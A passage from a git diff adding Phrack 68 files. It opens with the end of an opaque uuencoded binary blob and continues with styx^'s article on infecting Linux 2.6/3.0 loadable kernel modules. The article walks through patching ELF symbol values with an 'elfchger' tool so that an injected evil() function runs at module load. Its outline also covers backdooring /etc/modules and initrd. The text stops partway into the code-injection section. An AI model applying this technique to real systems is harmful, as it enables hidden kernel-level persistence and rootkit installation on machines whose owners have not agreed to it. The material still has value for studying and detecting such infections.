+M7"1Q!]]<*,D;2"5Y<T9$;+'`B)H*)A63<6$O2O^6LDG>5#@)P^-&Q1--(A9(
+MUA+?M)22_Q9BR@+8[]6KEE0<K-<]D*S26%3)F\DJ%5NE+*WDM>)*?CUYI;KW
+MH,22UXDL#4G%]89P3:$E;RJU-"$[LO2-""YY$\E%;^Q&$HPOP.2>!",(Y\=)
+M,*('WO.>]2::=I4F`9W"74E2H)Y6]8^6:`G2!,E.&@JSJ)#0)->;%+\4O>RG
+MC06P@/B57TMQ=ZT3TA/`Q-"U"(;;KBR#H5KVA@2PCSZ@EZ[+8"Q=%W9-SHOR
+M^.M.BL:BF+=&\X2QDBA&"]I(%KM)42SW9+&\)(SE0AIK;H9=EL8J%C,HCX66
+M[K-(9(KVJKD!F_2L^UT7.+`_-?R`%=K]G](AQ![I=0>*L%YTUU=7OU[]>OWK
+MY/[WR7M%[P?IGS[JLZH^#Q\\@+]KC[Y:E7_AL[:^_N!/:VL/'SQZ]'#M@?J^
+MNO9P7;V.5O_T&3ZS8IKD4?2G)#^=U)6;]_Y?]+/S_,7VMX?1XZUH^=5&M'S:
+M^B(Z3.%2?);WV$:Q-Q["[29Z5B1@=A$-U?;.+\'GX'T!I@*C*!TEQP.@`-]O
+MOWCQ:J?[_?:W*ZV=UZ]MZ[O\YO7!J]TW.T?[KU[:9ZJTZG=.\59+X>CC:)`=
+M:W1=*<8KJ_)!=SC%9ZV6A]'J^?AQY#Y<Z;663GN]Z"]M@D$<+?=4OZ_W=Z+E
+M$_A7O>`1J5>[W6Y63,_4#NZG_2W@AJ+E<?27_Q?]Y9[?V\UVA=R/Z"LP7;\[
+MG"[UN%R<)1"6='DPH19M2TN#D7I]`K]*;3K=!/NX=@?8>@\.C,>MI7RH`!#=
+M71FK_W$QX4_K3W]\/ML'Z7\VZ@UF_;18.?LD?<RA_ZM?;:P;^J\**OJ__F#]
+MT1_T_W-\OLA.1DJFB[K[+W=>O-G=.U3\P[]I,<][JIXSID1/BFD_&Z^</?6>
+MJ8U>?J@:*S\$O63I*:B2_(>7Q7W@T0KO>0\>>L]F(T4X^][#D]YH2CW!TQ.8
+M[/.#O;UGA[NR%-.VT<2M?2M7\[GU;X+#XKJ*Q\(&S7,)*GSY+[3_8=5ZGZZ/
+M>?S?PXU5;_^O;3Q<_V/_?Y[]KS'='@*WY`;`'7T+<!W"G.>@/I1^=""2)9HA
+MS--3>$8VQ8HI.+Z,:%^U-_"RYM]:P#[^6VL"S72I=+NG&(CH+D3RSGY.NTK@
+MC/^M]<N_*3&'?V>=Z"?U\N=->`;=]\XV83A1=(+MG+35GD_SO!/=^B(ZH!$D
+MT^CVY,?1K4XTB;EP=M+^,S0-XE/QLQ*H><?/"L6YIEWHK(V%(Y251<&1[FZ<
+MMS/4'4=9]`1&I/[>VXK6'BH9C\I#D9^HR$^JR-I#\&U7A?`75/CIWCT>0V#X
+MMU?6+R(8\UNL\B[>C+A9O^2/TUMZ7@T[U2.,%/A46=W%IGX*X,F*I.AEF5J1
+M./KUUTC]QG[AMQDTU[^S<F>S>AX]-0E<UUA5U9.XJIK+Z!:!'0L0[JC?5P[*
+M8=RP7$D9PMJ3?O?.9J/WT7$Z&(].040IXQF6ZV(Y1C;\KM$,)9J[6`B'0<UN
+M16UZ$;?OMAD3[\94<;,"^79P*+<G8C3<&B,C5N_0,VJE--V]5\\_Z^F!]/]\
+M-A@M#Y/33W0(S*'_ZP^^VO#YOXT'#_^@_[\9_1=\$4MUBBO"RT!0&=X!=$ES
+M()MW(GX-*B?:+_"R2T^[^6RD"K;U#CM%`_>(]N#Y9@LV'VPT>A#S4;'^U4-%
+M,X"E>KNQO/[5.V@ZBGBWW7H+[;_#>KRISL&\/"H&:3IIK\?8JB)FT!N1\&G>
+MFURVSSNF'WBU:?8>9>HFCP[*/LYS*K2W!;IW#G2PI$+,M7::3#2*='`"DZ2?
+M,<.S"X_;.`P^_]8ZZI]U'#X$AC7]Z5'`<9J>L+N(.KQ.DY^!0\_!'D(10S`<
+M/QF,/]#]JX+76AFRZJ#:E*"\/7M'Y1B2,"9U^JP)@#Z(:T>4G$P5O'3?^EXX
+MQTC@-(SUAL-8+PUCW1M&><'@8`"/W#9\47#O=1B8ZOOYVW?.,DPQU5$GRK!K
+M7@1%TJ=97Z%0UA=X@\F$-JBV'>;M(GK"U;"II]&3X]G)R5,<,G:X^@Y':<:Y
+M"K^N&'RP<4X@;OH=M73=Z1W`RUEO"D'4,0#"<1I-!@E<>('+P8J']'??:>"<
+MIM-T=-Z^]7S[/_=`;]8]NA73&M$,%1B3Z3AKXXC6:$1JCK`*8M8QX7.;Z]Q%
+M*(U/;!%N4__NY>#0W/[R'*`%\%<P*^US!L,Z=>IQ2]23^JYX$8*KU[0:Y-OL
+MG6[=:QAOY)T1_316ZVZ&LU"/6%5VY[8,;AUM?DQ4@<[D_YMJ*3S_3_O'8%RQ
+M?)+EBL1<?&[]S\8CT/\\VE""X,;Z^E?J_-]XH(K_<?Y_CO,_XL5'28X1(%I;
+M6UEM%>D4C&O4LV$T/CG!WXK2'X^+U/QF:S@J_"'K3\_4]S,*1G^X_^W&1C0:
+M(Q53?XOI>"+?K7OOHDE2%*+`Z_W7>\$B2;^_7%P.C\>#9;B<BN[WCT_O\]"7
+MP?^RF/+[PCQ6<UQ1Q:+5BZ]7'WSSX'CU#RVSJ_\Y^W1]S-O_#Q^NE_0_CS;^
+MV/^?5?_[8O^9J_K5#XS6%.]]?!WP:$H*4Z,'Q5):.\IM[7SWYN5_=M=?O_I;
+M=W?O^?:;%T?1^JKW^G#_O_?L?7][[<6;Z,F30,TX4$\Q0H?_2?5L6\O1FE^V
+MN[V[>[#^;/MPKWT11VTCX;=G:AZ3*03O@1=?1O_;=MN.00%B&\.+?/3D;L=1
+MMYL4PVZWK02HZ<8M+(?M!I1<6L<%LK\H4U90D')'*)=I,3Z!9@#W_VPT3(KW
+M77-%-[G\C/M_[<'ZPZ_P_'^PL;;Q<`WV_X,U]>B/_?\9/M/\\C&%;1Z"^SYP
+M`ZWTHI=.IM$^/MG+\W'^V(I"T9VW'KJ\(W7<F.R$02U`=C]@.9>-H,4[6!T9
+MZUB);=13<5G`13`DSO0:;*LJ*SOCX5"Q`C%U?><.M?%V-XV^ORR4U)FI+G=5
+M+W84;\]75S:2=RTL>#A)3L_2Z30C&X:3F9*QQB>*7YGE63'->@6&D&NC1P`$
+MBCK->M%H-CQ.\V(%&WB>I@,UCQ3C,"M!(AF=#B!\`-8[!ELH"`'53X<0-NKX
+M$HS6AIQK=Y),>V>I:@<;`LFO#XE`QQ-R$C_QYTL2H`E1D$P?4\VSZ712/+Y_
+M_U0!<G:\TAL/[P,6^MN5"BO(GZ:/2TV_'4]0:_$."_$/;A\!.AKKI^_@]VD*
+MJIV!`:M4]E/4::G]'X]:519;2-2*#H!*_:L$.8(X&PD8_04&<2CL>+"@;$9!
+M!I6_8)C643+RC`P)A^DTZ2?3!,->L*G:K`"/^8J/&$&:Y4B("RS<DEWY72?G
+M239`E';@D*TH$=T9&HZLLG.%+ID25F<*L'Q'HGC8/"T*'@.@-W[!H[@+_+@Z
+M44`1POB/2V-WQ8I3IA/=\9;]3H=*O_K^^^V7N]U7SPYWWASLQ:8IJ+72_8\]
+M:W\#<G,4?0&!#KPE0NQ6XTIF@VE5`X?;5%\U0,F,!I#^5J?$.ADDIU[-@S<O
+MO]L]Z.)!O14]?``U>Z!'*ABL8X7/:K%.DAZ%43#([K8SR<<0^@XFJQ9(485Q
+M7K3CMZOO!#B/9R?=Z;@[2!E8ZK>`ZA=$O73@--"E(?4JTF1T-KJCL*W'-T5`
+M&G6M*24Y-[]!>,K`FC57=")MKW:B03IJ0T^B*UWQUZVH/<[[\/IM]BX&/B>+
+M[D9?QV(;D`I)E;83R4;GX_=Z$HH0='"@W>GT4O0!>Z"+N+X%(27:L43O+JR$
+M,VXH:9^:QXKK4!V`7>,=5>V..P71T)IYD0Y$'6C5JR0[6K,=C8A,J(?`3,$R
+M3A*PPU9KWTW/DT'[#I>X$]N9V%70AY=I#JA-76/P7C;%1]T!F+,.4W'66?30
+M,G$)`QE0ZAQ;F2BI$_-VP>S[2?XA&WGSEZ/;^,IY!=>-Y<)?$"==V<CZ@Y;`
+M84VV!94R;_G8_G'T5IR5=-9AOG"$[^,?IS].;_??W8EN1VV&>>PW$6X`!N16
+MAR=QR]EB0:I?N8[J1.H.$5>J5I)+++26ME6!ZL&^IQ2>J+Y[*K3P"$S;\P8Q
+M..6RW5$Q&$^+.</QBR\\L$!_+DG0\(.<'F"^+68C'Y7:@9=N=\'S9\WI+%1$
+ME?&HJ0\W^*@AYI@\!SS%MJ(?6^73.`Q%5H*#@AX;F,;1/;JX44\53L/D"WAZ
+MEW$<9<Q8`KH1L*/209EBL+!2H=`INW;C\^7%<F;+SV#2P?DZ?02H@W,_=9^1
+M!-I^C&3BQQ$2"CER@:PE>A@B/V/+H-QG\D)419V5T[0W3;$7282($T7&#QE!
+MS3;"T51SD&MBZ`X)ROWDED.J%Z#ZN7ODBA.QB_8E@5?IJ5[-U5;I;1#IO6H_
+M!@N$D(!F]U8MR@I,`+_HAG"1P/[&P_#&6-X8TYMCNS?1RBDA[L)Q6)Y1:#IV
+MI1JV.%)-%K7-F05N.D8H+\<80AF%M,'E;;RTV(1<V.;XI:@RCZ!,T>7'\*`K
+M2LIIMZE.!\#;8:!TD";I18D_!KWP1J#Y'`*DA$QTOKB]NMY7OQ2DS'>6U9!N
+M1:L7MU=7'ERHQX)P@+`>W2X4WQ/><0SFCD'9#H/PQF8,;+=AR.$4QLQ0EMLN
+MK12)%I(P5LG2OLQ,X'!I):PN+*W:#+RX-$F8[L\Q$$B##26!H`M",',UQ32'
+MIN(.F-,Y!6&/<$&B$*X\1S+@"E[=DAEB6S?=B1[X^%UF+(#,!+%93T8/L%G?
+M9K3W%(>.`X@#)X*"UO6;_9J;+<DI%VHE'W,DQ&)T9VJ2GB@<-OH<08S[Z?'L
+M-$B20>_5O<8PS:+>BX*C)`IB47.M#/:@M`([3>VRZ"V*YK?1LJYBU]UFE,1_
+MSM(+.28D.KRL:FR=4N56@.0YNRN\([7J+L@6A69BMAP]^?%.`6C^F.8(18CD
+M!*:HIP<STT@1VYWGP;O,S934+[!,`1Z:QP=+;C9>W7)GT$YE,X&]*WN(6PW(
+M].V"`:)`X*]K3`#1;58PJ,&58*)FJ'WQ6&-:FD;R4=5*,.VS6\;K7(^SFZ%U
+MCH>.0/<>K`;(7@`"?!RITVFCCP`)C6G5Q7KH-:['BC6>0_RXR3+,'X0]]_R!
+MB#FW,Q`K^)APZ`3WJ5AW_UI`%?H"C''^N+J_X?N_FW'SO>[]_X,'&U_I^_\'
+MJVOK8/^[MO:'_\=G^>SL@(#2ZX&S+GR[=Z_U[>XS$EJBY7]&RZ,+<,TEQ]RM
+M:/EO:BNVW)_1\BD6?K4.^U.=S(K4`]=A6`YU>IXKDL-^Q/=G(_Z&=O(?H%)9
+M0HS65]97-EHO=E]O'WVG>EHQ3NK+^`9L5EHOS#A>_*5-1>-H>6`OQKAEIV'%
+MY,*MS7-%KY\=[MY_SNI=&J2J$>C2]XN'4O5=6W]8&,0)S7Z2#?2UF>Y>]"<:
+M!2?L`UB8^[,BOU_D/9@M_-^[3SYVI26Q:Q`M[_^EK6K'Y"^]A-90B@B?J2,'
+MOZ,B![\E_9^2'JS#CRTJ=C8>I`4DJQF,L^DR>5:@;P!]5<7PU_EDRFW!&8J/
+MS!?0#ZIRN@WUL]420W#&`V[1?VGO[,3",=IY#;[$<OP*TE2LU3(#>1R9KRN]
+MR01;?/U:-NF\AR;M)/P&U7`?1]8;HCP\^\XT!#,V[<AUMR!]'-GOE9/FMV;.
+MM!ABA&;U'D=V)2N;HY>F-5QUOS$%UL=19$!<MQ[N8I1:TJC$ZZM_5K9H"YAF
+M#3:*MAU4?.QB9JAMKP"T[3RR+>)*BQ]UK9GU=K#:;HS'8I.H@NA-66X-'[LE
+M-0K1]O*1D5='?Z]$1[,Z9B>*EM1/O?5:2R]VP9#H8/O@[UV@.5N6<JW<%_N,
+M:N'FJJNCMOG*?;N7_F=R.3U3E&VY%]TA'N[6]BW%XVVLKM[Y'R@<*/`,"JQ!
+M`>J3=DN#@6)!JH,[HD$5*$<U#++.G9V+F($)_``3>/A`CY_0H7XP=L7-ZC1<
+MFE9+T7B?Z-55_4M;G>6*)EVH1K2--ZZ56#=JM$2F%FV6J)6[.FZ4AQ[XKMQ=
+MP3\2V?AUDY-%EZTXQ_1K]P#C7^LKYV*S^46!B,NA__]&SD#^WQ+YW\3^=V/C
+M0<G_[]$?]G^_-_]OXV[%SL1DJHKI\+2'-'P/.WS]FW!GTL78I0E_4HEA.@2C
+M%7S2B>YLWT&]"+<NK6YUAXJ+;HOZQO,*'6K_D.[_^/SQ^>/SQZ?Z\_\!#SD"
+%@`!P%P``
+`
+end
+
+
+--[ EOF
diff --git a/phrack68/11.txt b/phrack68/11.txt
new file mode 100644
index 0000000..afa9b28
--- /dev/null
+++ b/phrack68/11.txt
@@ -0,0 +1,2680 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x0b of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=----------------=[ Infecting loadable kernel modules ]=----------------=|
+|=-------------------=[ kernel versions 2.6.x/3.0.x ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------------------=[ by styx^ ]=-----------------------------=|
+|=-----------------------=[ the.styx@gmail.com ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+---[ Index
+
+
+    1 - Introduction
+
+    2 - Kernel 2.4.x method
+        2.1 - First try
+        2.2 - LKM loading explanations
+        2.3 - The relocation process
+
+    3 - Playing with loadable kernel modules on 2.6.x/3.0.x
+        3.1 - A first example of code injection
+
+    4 - Real World: Is it so simple?
+        4.1 - Static functions
+            4.1.1 - Local symbol
+            4.1.2 - Changing symbol bind
+            4.1.3 - Try again
+        4.2 - Static __init functions
+        4.3 - What about cleanup_module
+
+    5 - Real life example
+        5.1 - Inject a kernel module in /etc/modules
+        5.2 - Backdooring initrd
+
+    6 - What about other systems?
+        6.1 - Solaris
+            6.1.1 - A basic example
+            6.1.2 - Playing with OS modules
+            6.1.3 - Keeping it stealthy
+        6.2 - *BSD
+            6.2.1 - FreeBSD - NetBSD - OpenBSD
+
+    7 - Conclusion
+
+    8 - References
+
+    9 - Codes
+        9.1 - Elfstrchange
+        9.2 - elfstrchange.patch
+
+
+---[ 1 - Introduction
+
+
+In Phrack #61 [1] truff introduced a new method to infect a loadable kernel
+module on Linux kernel x86 2.4.x series.  Actually this method is currently
+not compatible with the Linux kernel 2.6.x/3.0.x series due to the many
+changes made in kernel internals.  As a result, in order to infect a kernel
+module, changing the name of symbols in .strtab section is not enough
+anymore; the task has become a little bit trickier.  In this article it
+will be shown how to infect a kernel module on Linux kernel x86 2.6.*/3.0.x
+series. All the methods discussed here have been tested on kernel version
+2.6.35, 2.6.38 and 3.0.0 on Ubuntu 10.10, 11.04 and 11.10 and on kernel
+version 2.6.18-238 on CentOS 5.6.
+
+The proposed method has been tested only on 32-bit architectures: a 64-bit
+adaptation is left as an exercise to the reader.  Finally, I want to
+clarify that the proposed paper is not innovative, but is only an update of
+truff's paper.
+
+
+---[ 2 - Kernel 2.4.x method
+
+
+---[ 2.1 - First try
+
+
+With the help of a simple example it will be explained why truff's method
+is no longer valid: we are using the "elfstrchange" tool provided in his
+paper. First, let's write a simple testing kernel module:
+
+/****************** orig.c ***********************************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+int evil(void) {
+
+    printk(KERN_ALERT "Init Inject!");
+
+    return 0;
+
+}
+
+int init(void) {
+
+    printk(KERN_ALERT "Init Original!");
+
+    return 0;
+}
+
+void clean(void) {
+
+    printk(KERN_ALERT "Exit Original!");
+
+    return;
+}
+
+module_init(init);
+module_exit(clean);
+/****************** EOF **************************************************/
+
+The module_init macro is used to register the initialization function of
+the loadable kernel module: in other words, the function which is called
+when the module is loaded, is the init() function.  Reciprocally the
+module_exit macro is used to register the termination function of the LKM
+which means that in our example clean() will be invoked when the module is
+unloaded. These macros can be seen as the constructor/destructor
+declaration of the LKM object. A more exhaustive explanation can be found
+in section 2.2.
+
+Below is the associated Makefile:
+
+/****************** Makefile *********************************************/
+obj-m += orig.o
+
+KDIR    := /lib/modules/$(shell uname -r)/build
+PWD    := $(shell pwd)
+
+default:
+    $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
+
+clean:
+    $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
+/****************** EOF **************************************************/
+
+Now the module can be compiled and the testing can start:
+
+$ make
+...
+
+Truff noticed that altering the symbol names located in the .strtab section
+was enough to fool the resolution mechanism of kernel v2.4. Indeed the
+obj_find_symbol() function of modutils was looking for a specific symbol
+("init_module") using its name [1]:
+
+/*************************************************************************/
+module->init = obj_symbol_final_value(f, obj_find_symbol(f,
+                                                     SPFX "init_module"));
+module->cleanup = obj_symbol_final_value(f, obj_find_symbol(f,
+                                                  SPFX "cleanup_module"));
+/*************************************************************************/
+
+Let's have a look at the ELF symbol table of orig.ko:
+
+$ objdump -t orig.ko
+
+orig.ko:     file format elf32-i386
+
+SYMBOL TABLE:
+
+...
+
+00000040 g     F .text	0000001b evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000020 g     F .text	0000001b init_module
+00000000 g     F .text	00000019 clean
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000020 g     F .text	0000001b init
+
+We want to setup evil() as the initialization function instead of init().
+Truff was doing it in two steps:
+
+    1. renaming init to dumm
+    2. renaming evil to init
+
+This can easily be performed using his tool, "elfstrchange", slightly
+bug-patched (see section 9):
+
+$ ./elfstrchange orig.ko init dumm
+[+] Symbol init located at 0xa91
+[+] .strtab entry overwritten with dumm
+
+$ ./elfstrchange orig.ko evil init
+[+] Symbol evil located at 0xa4f
+[+] .strtab entry overwritten with init
+
+$ objdump -t orig.ko
+
+...
+
+00000040 g     F .text	0000001b init          <-- evil()
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000020 g     F .text	0000001b init_module
+00000000 g     F .text	00000019 clean
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000020 g     F .text	0000001b dumm          <-- init()
+
+Now we're loading the module:
+
+$ sudo insmod orig.ko
+$ dmesg |tail
+...
+
+[ 2438.317831] Init Original!
+
+As we can see the init() function is still invoked. Applying the same
+method with "init_module" instead of init doesn't work either. In the next
+subsection the reasons of this behaviour are explained.
+
+
+---[ 2.2 LKM loading explanations
+
+
+In the above subsection I briefly mentioned the module_init and
+module_exit macros. Now let's analyze them.  In kernel v2.4 the entry and
+exit functions of the LKMs were init_module() and cleanup_module(),
+respectively.  Nowadays, with kernel v2.6, the programmer can choose the
+name he prefers for these functions using the module_init() and
+module_exit() macros. These macros are defined in "include/linux/init.h"
+[3]:
+
+
+/*************************************************************************/
+#ifndef MODULE
+
+[...]
+
+#else /* MODULE */
+
+[...]
+
+/* Each module must use one module_init(). */
+#define module_init(initfn)                                     \
+        static inline initcall_t __inittest(void)               \
+        { return initfn; }                                      \
+        int init_module(void) __attribute__((alias(#initfn)));
+
+/* This is only required if you want to be unloadable. */
+#define module_exit(exitfn)                                     \
+        static inline exitcall_t __exittest(void)               \
+        { return exitfn; }                                      \
+        void cleanup_module(void) __attribute__((alias(#exitfn)));
+
+[...]
+
+#endif /*MODULE*/
+/*************************************************************************/
+
+
+We are only interested in the "loadable module" case, that is when MODULE
+is defined. As you can see, init_module is always declared as an alias of
+initfn, the argument of the module_init macro. As a result, the compiler
+will always produce identical symbols in the relocatable object: one for
+initfn and one for "module_init". The same rule applies for the termination
+function, if the unloading mechanism is compiled in the kernel (that is if
+CONFIG_MODULE_UNLOAD is defined).
+
+When a module is compiled, first the compiler creates an object file for
+each source file, then it generates an additional generic source file,
+compiles it and finally links all the relocatable objects together.
+
+In the case of orig.ko, orig.mod.c is the file generated and compiled as
+orig.mod.o. The orig.mod.c follows:
+
+/*************************************************************************/
+#include <linux/module.h>
+#include <linux/vermagic.h>
+#include <linux/compiler.h>
+
+MODULE_INFO(vermagic, VERMAGIC_STRING);
+
+struct module __this_module
+__attribute__((section(".gnu.linkonce.this_module"))) = {
+ .name = KBUILD_MODNAME,
+ .init = init_module,
+#ifdef CONFIG_MODULE_UNLOAD
+ .exit = cleanup_module,
+#endif
+ .arch = MODULE_ARCH_INIT,
+};
+
+static const struct modversion_info ____versions[]
+__used
+__attribute__((section("__versions"))) = {
+	{ 0x4d5503c4, "module_layout" },
+	{ 0x50eedeb8, "printk" },
+	{ 0xb4390f9a, "mcount" },
+};
+
+static const char __module_depends[]
+__used
+__attribute__((section(".modinfo"))) =
+"depends=";
+
+
+MODULE_INFO(srcversion, "EE786261CA9F9F457DF0EB5");
+/*************************************************************************/
+
+This file declares and partially initializes a struct module which will be
+stored in the ".gnu.linkonce.this_module" section of the object file. The
+module struct is defined in "include/linux/module.h":
+
+/*************************************************************************/
+struct module
+{
+	[...]
+
+	/* Unique handle for this module */
+	char name[MODULE_NAME_LEN];
+
+	[...]
+
+	/* Startup function. */
+	int (*init)(void);
+
+	[...]
+
+	/* Destruction function. */
+	void (*exit)(void);
+
+	[...]
+};
+/*************************************************************************/
+
+So when the compiler auto-generates the C file, it always makes the .init
+and .exit fields of the struct pointing to the function "init_module" and
+"cleanup_module". But the corresponding functions are not declared in this
+C file so they are assumed external and their corresponding symbols are
+declared undefined (*UND*):
+
+$ objdump -t orig.mod.o
+
+orig.mod.o:     file format elf32-i386
+
+SYMBOL TABLE:
+[...]
+00000000         *UND*	00000000 init_module
+00000000         *UND*	00000000 cleanup_module
+
+When the linking with the other objects is performed, the compiler is then
+able to solve this issue thanks to the aliasing performed by the
+module_init() and module_exit() macros.
+
+$ objdump -t orig.ko
+
+00000000 g     F .text	0000001b evil
+00000000 g     O .gnu.linkonce.this_module	00000184 __this_module
+00000040 g     F .text	00000019 cleanup_module
+00000020 g     F .text	0000001b init_module
+00000040 g     F .text	00000019 clean
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000020 g     F .text	0000001b init
+
+The aliasing can be seen as a smart trick to allow the compiler to declare
+and fill the __this_module object without too much trouble. This object is
+essential for the loading of the module in the v2.6.x/3.0.x kernels.
+
+To load the LKM, a userland tool (insmod/modprobe/etc.) calls the
+sys_init_module() syscall which is defined in "kernel/module.c":
+
+/*************************************************************************/
+SYSCALL_DEFINE3(init_module, void __user *, umod,
+               unsigned long, len, const char __user *, uargs)
+{
+        struct module *mod;
+        int ret = 0;
+
+        ...
+
+        /* Do all the hard work */
+        mod = load_module(umod, len, uargs);
+
+        ...
+
+        /* Start the module */
+        if (mod->init != NULL)
+                ret = do_one_initcall(mod->init);
+        ...
+}
+/*************************************************************************/
+
+The load_module() function returns a pointer to a "struct module" object
+when the LKM is loaded in memory. As stated in the source code,
+load_module() handles the main tasks associated with the loading and as
+such is neither easy to follow nor to explain in a few sentences. However
+there are two important things that you should know:
+
+    - load_module() is responsible for the ELF relocations
+    - the mod->init is holding the relocated value stored in __this_module
+
+Note: Because __this_module is holding initialized function pointers (the
+address of init() and clean() in our example), there has to be a relocation
+at some point.
+
+After the relocation is performed, mod->init() refers to the kernel mapping
+of init_module() and can be called through do_one_initcall() which is
+defined in "init/main.c":
+
+/*************************************************************************/
+int __init_or_module do_one_initcall(initcall_t fn)
+{
+        int count = preempt_count();
+        int ret;
+
+        if (initcall_debug)
+                ret = do_one_initcall_debug(fn);   <-- init_module() may be
+        else                                           called here
+                ret = fn();                        <-- or it may be called
+                                                       here
+        msgbuf[0] = 0;
+
+        ...
+
+        return ret;
+}
+/*************************************************************************/
+
+
+---[ 2.3 - The relocation process
+
+
+The relocation itself is handled by the load_module() function and without
+any surprise the existence of the corresponding entries can be found in the
+binary:
+
+$ objdump -r orig.ko
+
+./orig.ko:     file format elf32-i386
+
+    ...
+
+RELOCATION RECORDS FOR [.gnu.linkonce.this_module]:
+OFFSET   TYPE              VALUE
+000000d4 R_386_32          init_module
+00000174 R_386_32          cleanup_module
+
+This means that the relocation has to patch two 32-bit addresses (because
+type == R_386_32) located at:
+
+- (&.gnu.linkonce.this_module = &__this_module) + 0xd4   [patch #1]
+- (&.gnu.linkonce.this_module = &__this_module) + 0x174  [patch #2]
+
+A relocation entry (in a 32-bit environment) is an Elf32_Rel object and
+is defined in "/usr/include/elf.h":
+
+/*************************************************************************/
+typedef struct
+{
+  Elf32_Addr    r_offset;               /* Address */
+  Elf32_Word    r_info;                 /* Relocation type and symbol index
+*/
+} Elf32_Rel;
+
+#define ELF32_R_SYM(val)                ((val) >> 8)
+/*************************************************************************/
+
+The important thing to remember is that the symbol is located using
+ELF32_R_SYM() which provides an index in the table of symbols, the .symtab
+section.
+
+This can be easily seen:
+
+$ readelf -S ./orig.ko  | grep gnu.linkonce
+ [10] .gnu.linkonce.thi PROGBITS    00000000 000240 000184 00  WA  0   0 32
+ [11] .rel.gnu.linkonce REL         00000000 0007f8 000010 08     16  10  4
+
+The relocation section associated with section 10 is thus section 11.
+
+$ readelf -x 11 orig.ko
+
+Hex dump of section '.rel.gnu.linkonce.this_module':
+  0x00000000 d4000000 01160000 74010000 01150000 ........t.......
+
+So ELF32_R_SYM() is returning 0x16 (=22) for the first relocation and 0x1b
+(=21) for the second one. Now let's see the table of symbols:
+
+$ readelf -s .orig.ko
+
+Symbol table '.symtab' contains 33 entries:
+   Num:    Value  Size Type    Bind   Vis      Ndx Name
+     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
+
+    ...
+
+    21: 00000040    25 FUNC    GLOBAL DEFAULT    2 cleanup_module
+    22: 00000020    27 FUNC    GLOBAL DEFAULT    2 init_module
+
+    ...
+
+This is a perfect match. So when the LKM is loaded:
+
+    - The kernel performs a symbol resolution and the corresponding symbols
+      are updated with a new value. At his point init_module and
+      cleanup_module are holding kernel space addresses.
+
+    - The kernel performs the required relocations using the index in the
+      table of symbols to know how to patch. When the relocation is
+      performed __this_module has been patched twice.
+
+At this point it should be clear that the address value of the init_module
+symbol has to be modified if we want to call evil() instead of init().
+
+
+---[ 3 - Playing with loadable kernel modules on 2.6.x/3.0.x
+
+
+As pointed out above, the address of the init_module symbol has to be
+modified in order to invoke the evil() function at loading time. Since the
+LKM is a relocatable object, this address is calculated using the offset
+(or relative address) stored in the st_value field of the Elf32_Sym
+structure [2], defined in "/usr/include/elf.h":
+
+/*************************************************************************/
+typedef struct
+{
+  Elf32_Word	st_name;	/* Symbol name (string tbl index) */
+  Elf32_Addr	st_value;	/* Symbol value */
+  Elf32_Word	st_size;	/* Symbol size */
+  unsigned char	st_info;	/* Symbol type and binding */
+  unsigned char	st_other;	/* Symbol visibility */
+  Elf32_Section	st_shndx;	/* Section index */
+} Elf32_Sym;
+/*************************************************************************/
+
+$ objdump -t orig.ko
+
+orig.ko:     file format elf32-i386
+
+SYMBOL TABLE:
+
+...
+
+00000040 g     F .text	0000001b evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000020 g     F .text	0000001b init_module
+00000000 g     F .text	00000019 clean
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000020 g     F .text	0000001b init
+
+The objdump output shows that:
+
+- the relative address of evil() is 0x00000040;
+- the relative address of init_module() is 0x00000020;
+- the relative address of init() is 0x00000020;
+
+Altering these offsets is enough to have evil() being called instead of
+init_module() because the relocation process in the kernel will produce the
+corresponding "poisoned" virtual address.
+
+The orig.ko has to look like this:
+
+00000040 g     F .text	0000001b evil
+...
+00000040 g     F .text	0000001b init_module
+
+To do so, we can use my 'elfchger' script in order to modify the ELF file.
+The code structure is the same as truff's one, with some minor changes.
+The script takes the following input parameters:
+
+./elfchger -s [symbol] -v [value] <module_name>
+
+Where [value] represents the new relative address of the [symbol]
+(init_module in our case) in <module_name>:
+
+Let's apply it to our example:
+
+$ ./elfchger -s init_module -v 00000040 orig.ko
+[+] Opening orig.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0x77c
+[+] Finding ".strtab" section...
+	>> Found at 0x7a4
+[+] Getting symbol' infos:
+	>> Symbol found at 0x99c
+	>> Index in symbol table: 0x16
+[+] Replacing 0x00000020 with 0x00000040... done!
+
+The ELF file is now changed:
+
+$ objdump -t orig.ko
+
+orig.ko:     file format elf32-i386
+
+SYMBOL TABLE:
+...
+
+00000040 g     F .text	0000001b evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000040 g     F .text	0000001b init_module
+00000000 g     F .text	00000019 clean
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000020 g     F .text	0000001b init
+
+Let's load the module:
+
+$ sudo insmod orig.ko
+
+$ dmesg | tail
+...
+
+[ 5733.929286] Init Inject!
+
+$
+
+As expected the evil() function is invoked instead of init() when the
+module is loaded.
+
+
+---[ 3.1 A first example of code injection
+
+The next step is the injection of external code inside the original module
+(orig.ko). A new kernel module (evil.ko) will be injected into orig.ko.
+We will use both orig.c and evil.c source codes:
+
+/***************************** orig.c ************************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+int init_module(void) {
+
+    printk(KERN_ALERT "Init Original!");
+
+    return 0;
+}
+
+void clean(void) {
